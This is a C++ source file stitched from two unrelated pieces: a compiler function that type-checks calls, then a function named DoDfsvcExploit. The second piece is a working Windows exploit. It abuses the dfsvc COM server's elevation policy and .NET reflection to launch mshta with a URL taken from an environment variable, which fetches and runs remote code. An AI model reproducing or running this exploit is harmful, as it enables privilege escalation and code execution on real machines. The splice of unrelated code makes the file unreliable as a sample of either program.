AST::Value CallValue(Context& context, AST::Value rawValue, HeapArray<AST::Value> args, const Debug::SourceLocation& location) {
auto value = derefValue(std::move(rawValue));
if (getDerefType(value.type())->isTypename()) {
return CallValue(context, GetStaticMethod(context, std::move(value), context.getCString("create"), location), std::move(args), location);
}
if (!value.type()->isCallable()) {
// Try to use 'call' method.
if (TypeCapabilities(context).hasCallMethod(getDerefType(value.type()))) {
return CallValue(context, GetMethod(context, std::move(value),
context.getCString("call"), location),
std::move(args), location);
} else {
context.issueDiag(TypeNotCallableDiag(getDerefType(value.type())),
location);
return AST::Value::Constant(Constant::Integer(0), context.typeBuilder().getIntType());
}
}
const auto functionType = value.type()->asFunctionType();
const auto& typeList = functionType.parameterTypes();
if (functionType.attributes().isVarArg()) {
if (args.size() < typeList.size()) {
context.issueDiag(VarArgTooFewArgsDiag(value.toDiagString(),
args.size(), typeList.size()),
location);
}
} else {
if (args.size() != typeList.size()) {
context.issueDiag(CallIncorrectArgCountDiag(value.toDiagString(),
args.size(), typeList.size()),
location);
}
}
if (!TypeCapabilities(context).isSized(functionType.returnType())) {
// TODO: also check that the type is not abstract.
context.issueDiag(CallReturnTypeIsUnsizedDiag(functionType.returnType()),
location);
}
if (functionType.returnType()->hasConst()) {
context.issueDiag(CallReturnTypeIsConstDiag(functionType.returnType()),
location);
}
return addDebugInfo(AST::Value::Call(std::move(value), CastFunctionArguments(context, std::move(args), typeList, location),
functionType.returnType()->stripConst()), location);
}
void DoDfsvcExploit()
{
CLSID clsid;
CLSIDFromString(CLSID_DFSVC, &clsid);
DebugPrintf("Starting DFSVC Exploit\n");
mscorlib::_ObjectPtr obj;
HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
if (FAILED(hr))
{
WCHAR cmdline[] = L"dfsvc.exe";
STARTUPINFO startInfo = { 0 };
PROCESS_INFORMATION procInfo = { 0 };
// Start dfsvc (because we can due to the ElevationPolicy)
if (CreateProcess(GetEnv(L"windir") + L"\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline,
nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo))
{
CloseHandle(procInfo.hProcess);
CloseHandle(procInfo.hThread);
// Just sleep to ensure it comes up
Sleep(4000);
hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj));
}
else
{
DebugPrintf("Couldn't create service %d\n", GetLastError());
}
}
if (SUCCEEDED(hr))
{
try
{
mscorlib::_TypePtr type = obj->GetType();
// Get type of Type (note defaults to RuntimeType then TypeInfo)
type = type->GetType()->BaseType->BaseType;
DebugPrintf("TypeName: %ls", type->FullName.GetBSTR());
mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1);
DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod);
std::vector<variant_t> getTypeArgs;
getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
// Get process type
type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs);
if (type)
{
mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2);
if (startMethod)
{
std::vector<variant_t> startArgs;
startArgs.push_back(L"mshta");
startArgs.push_back(GetEnv(L"MYURL"));
ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
}
else
{
DebugPrintf("Couldn't find Start method");
}
}
else
{
DebugPrintf("Couldn't find Process Type");
}
}
catch (_com_error e)
{
DebugPrintf("COM Error: %ls\n", e.ErrorMessage());
}
}
else
{
DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr);
}
}
